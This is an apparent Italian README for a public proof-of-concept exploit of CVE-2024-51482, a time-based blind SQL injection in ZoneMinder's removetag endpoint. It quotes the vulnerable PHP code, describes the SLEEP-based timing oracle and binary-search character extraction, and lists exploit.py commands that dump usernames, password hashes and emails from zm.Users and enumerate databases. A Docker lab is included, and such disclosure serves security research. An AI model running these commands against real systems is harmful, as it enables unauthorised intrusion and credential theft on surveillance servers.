
Proof of Concept di SQL injection basata sul tempo per CVE-2024-51482 in ZoneMinder, con laboratorio Docker riproducibile ed estrazione automatica dei dati.
⚠️ Solo per scopi educativi e ricerca di sicurezza autorizzata. Eseguire questo strumento su sistemi di cui non si è proprietari o senza autorizzazione scritta è illegale.
Questo repository contiene un PoC di SQL injection basata sul tempo che prende di mira ZoneMinder.
Lo strumento consente:
Include anche un lab Docker completamente riproducibile per test sicuri.
ZoneMinder è un'applicazione software di videosorveglianza a circuito chiuso gratuita e open source. La vulnerabilità deriva da una convalida insufficiente dell'input nell'endpoint removetag di ZoneMinder. L'input fornito dall'utente viene incorporato direttamente nelle query SQL senza una corretta sanificazione o parametrizzazione, consentendo agli aggressori di iniettare payload SQL booleani dannosi. Lo sfruttamento sfrutta:
SLEEP(x - IF(condition, 0, x))
per dedurre i dati tramite i tempi di risposta.
Frammento di codice vulnerabile completo da Avviso del Mantenitore GitHub:
case 'removetag' :
$tagId = $_REQUEST['tid'];
dbQuery('DELETE FROM Events_Tags WHERE TagId = ? AND EventId = ?', array($tagId, $_REQUEST['id']));
$sql = "SELECT * FROM Events_Tags WHERE TagId = $tagId";
$rowCount = dbNumRows($sql);
if ($rowCount < 1) {
$sql = 'DELETE FROM Tags WHERE Id = ?';
$values = array($_REQUEST['tid']);
$response = dbNumRows($sql, $values);
ajaxResponse(array('response'=>$response));
}
Attaccante Applicazione Web ZoneMinder
│ │
│ [Auth] │
│ POST /zm/index.php │
│ {username, password} │
│────────────────────────────────────────►│
│◄────────────────────────────────────────│
│ 200 OK + Set-Cookie: ZMSESSID=... │ ← sessione autenticata
│ │
│ [CVE-2024-51482] │
│ GET /zm/index.php │
│ ?view=request&request=event │
│ &action=removetag&tid=<payload> │
│────────────────────────────────────────►│
│ Query booleana SQL eseguita
│ IF(condizione, nessun ritardo, SLEEP)
│◄────────────────────────────────────────│
│ Risposta ritardata (oracolo temporale) │ ← condizione dedotta
│ │
│ Richieste ripetute │
│ ASCII(SUBSTRING(query,pos,1)) │
│────────────────────────────────────────►│
│◄────────────────────────────────────────│
│ Differenze nei tempi rivelano i caratteri │
│ │
│ Ricerca binaria per carattere │
│────────────────────────────────────────►│
│◄────────────────────────────────────────│
│ Dati estratti (1 carattere alla volta) │
│ │
│ SELECT Username, Password FROM Users │
│────────────────────────────────────────►│
│◄────────────────────────────────────────│
│ Divulgazione completa del database │
│ │
✓ Esfiltrazione completa dei dati tramite SQLi cieca
CVE-2024-51482/
├── exploit.py
├── README.md
├── requirements.txt
├── docker-compose.yml
├── .env.example
├── docker/
│ ├── Dockerfile
│ └── entrypoint.sh
└── logs/
git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
cd CVE-2024-51482-POC
pip install -r requirements.txt
git clone https://github.com/0xDaeras/CVE-2024-51482-POC.git
cd CVE-2024-51482-POC
cp .env.example .env # Configurare le variabili d'ambiente
docker compose up -d
Senza alcun flag, lo strumento si autenticherà al target, ne verificherà la vulnerabilità e, se vulnerabile, eseguirà il dump delle colonne ID, Username, Password, Name ed Email dalla tabella zm.Users (comando dump-users).
python exploit.py -t http://target/zm -u <username> -p <password>
python exploit.py -h
Controlla solo se il target è vulnerabile.
python exploit.py -t http://target/zm -u <username> -p <password> check
Esegue il dump delle colonne ID, Username, Password, Name ed Email dalla tabella zm.Users. Comando predefinito se non ne viene specificato nessuno.
python exploit.py -t http://target/zm -u <username> -p <password> dump-users
Elenca tutti i database.
python exploit.py -t http://target/zm -u <username> -p <password> list-db
Elenca le tabelle in un database specificato.
python exploit.py -t http://target/zm -u <username> -p <password> list-tables --db <database>
Elenca le colonne in una tabella specificata.
python exploit.py -t http://target/zm -u <username> -p <password> list-columns --db <database> --table <table>